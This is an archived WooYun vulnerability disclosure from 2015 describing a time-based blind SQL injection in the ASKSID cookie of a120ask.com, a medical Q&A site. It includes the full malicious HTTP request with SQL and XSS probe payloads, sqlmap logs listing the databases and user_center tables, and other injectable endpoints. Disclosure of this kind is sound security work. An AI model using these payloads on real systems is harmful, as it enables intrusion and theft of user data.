乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-15: 厂商已经确认,细节仅向厂商公开 2015-10-25: 细节向核心白帽子及相关领域专家公开 2015-11-04: 细节向普通白帽子公开 2015-11-14: 细节向实习白帽子公开 2015-11-29: 细节向公众公开
幽暗的街角,宁静的雨夜,是谁在呼唤,仿佛风一般,破碎在梦的彼岸
数据包:
GET /forget_pwd HTTP/1.1X-Forwarded-For: 8.8.8.8'Cookie: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab88b0fc66715115b95a; ASKSID=if(now()=sysdate()%2Csleep(0)%2C0)/*'XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR'"XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR"*/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036369=cnzz_eid%3D1553699147-1444573889-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626; Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=1395883615-1444573135-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1444573135; Hm_lvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")X-Requested-With: XMLHttpRequestReferer: http://a.120ask.com/Host: a.120ask.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
参数 ASKSID 未过滤 导致可注入
两库 其中 user_center 库中存在 122 张表
由于时间关系 这里就不跑了 删除的医生账号表都存在 其他的 你们看看就成
web application technology: Nginxback-end DBMS: MySQL 5.0.12[00:22:31] [INFO] fetching tables for database: 'user_center'[00:22:31] [INFO] fetching number of tables for database 'user_center'[00:22:31] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[00:22:31] [WARNING] time-based comparison requires larger statistical model, please wait..............................[00:22:35] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y1[00:23:07] [INFO] adjusting time delay to 1 second due to good response times22[00:23:13] [INFO] retrieved: adm[00:23:55] [ERROR] invalid character detected. retrying..[00:23:55] [WARNING] increasing time delay to 2 secondsin_title_1[00:26:51] [INFO] retrieved: admin_title_2[00:27:54] [INFO] retrieved: alias_bind_log[00:31:45] [INFO] retrieved: area_info[00:34:12] [INFO] retrieved: ask_head[00:36:12] [INFO] retrieved: base_hospital[00:39:55] [INFO] retrieved: class_relation[00:43:51] [INFO] retrieved: doctor_auth_apply[00:49:11] [INFO] retrieved: doctor_auth_base[00:50:54] [INFO] retrieved: doctor_auth_t[00:52:33] [ERROR] invalid character detected. retrying..[00:52:33] [WARNING] increasing time delay to 3 secondsype[00:54:00] [INFO] retrieved: doctor_auth_type_status[00:58:41] [INFO] retrieved: doctor_class[01:01:18] [INFO] retrieved: doctor_del_user[01:05:23] [INFO] retrieved: doctor_education[01:09:41] [INFO] retrieved: doctor_ext[01:11:48] [INFO] retrieved: doctor_fla
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 344 HTTP(s) requests:---Parameter: Cookie #1* ((custom) HEADER) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab88b0fc66715115b95a; ASKSID=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))gusd) AND 'ENhF'='ENhF'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036369=cnzz_eid=1553699147-1444573889-http%3A%2F%2Fwww.acunetix-referrer.com%2F%26ntime=1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626;Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=1395883615-1444573135-http%3A%2F%2Fwww.acunetix-referrer.com%2F|1444573135; Hm_lvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")---[00:05:06] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.12[00:05:06] [INFO] fetching database names[00:05:06] [INFO] fetching number of databases[00:05:06] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[00:05:06] [INFO] retrieved:[00:05:06] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y2[00:05:29] [INFO] retrieved:[00:05:39] [INFO] adjusting time delay to 2 seconds due to good response times[00:06:02] [ERROR] invalid character detected. retrying..[00:06:02] [WARNING] increasing time delay to 3 secondsinfo[00:08:29] [ERROR] invalid character detected. retrying..[00:08:29] [WARNING] increasing time delay to 4 secondsrmation_schema[00:15:57] [INFO] retrieved: user_center[00:22:11] [ERROR] invalid character detected. retrying..[00:22:11] [WARNING] increasing time delay to 5 secondsavailable databases [2]:[*] information_schema[*] user_center[00:22:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\a.120ask.com'[*] shutting down at 00:22:12
其他几处也包含 此cookie参数可注入的地方
http://a.120ask.com/askregsavehttp://a.120ask.com/checking/http://a.120ask.com/user/ajax_checkcodehttp://a.120ask.com/user/reg_checking/
危害等级:中
漏洞Rank:8
确认时间:2015-10-15 09:27
漏洞已经确认,近期会安排礼物
暂无